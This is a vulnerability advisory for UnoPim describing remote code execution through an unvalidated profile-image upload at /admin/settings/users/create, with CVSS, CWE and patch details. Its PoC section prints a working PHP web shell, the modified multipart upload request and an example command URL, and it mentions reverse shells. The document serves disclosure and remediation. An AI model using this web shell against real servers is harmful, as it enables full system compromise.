UnoPim vulnerable to remote code execution through Arbitrary File upload

Description

Summary:

Affected Functionality: Image upload at User creation
Endpoint: /admin/settings/users/create

Details

The image upload at the user creation feature performs only client side file type validation.
A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite.
Make changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.

Modified part of the multipart request body:

Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

PoC

  1. Upload an image file as profile picture during user creation , now capture the request and modify.
    File content: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
    File name: poc.php
    Content-Type can be any, doesn't matter.
  2. Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls
    // pass the command to run as parameter value for cmd, example running ls command on the system

Likewise a reverse shell code ( reverse shell of other languages ) can be executed to create a connection to attacker controlled system.

Impact

Every user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network.
Please see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn

Recommendation:

Extension Validation: Whitelist allowed extensions. ( use endswith() check rather than contains() as an attacker can bypass such a restriction with filename: poc.jpg.php

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-08-21 14:26:31 UTC
Updated
2026-05-28 18:05:22 UTC
GitHub reviewed
2025-08-21 14:26:31 UTC
NVD published
2025-08-21

EPSS Score

Score Percentile
0.13% 31.81%

CVSS Scores

Base score Version Severity Vector
7.3 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:H)
High privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:H)
High availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.
Exploit maturity (threat) (E:P)
Proof-of-concept: public PoC exists; no reported exploitation and no known simplification tools.

Identifiers

CWEs

CWE id Name
CWE-434 Unrestricted Upload of File with Dangerous Type

Credits

  • sn1p3rt3s7 (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer unopim/unopim <= 0.2.0 0.2.1

References

cvelogic Threat Intelligence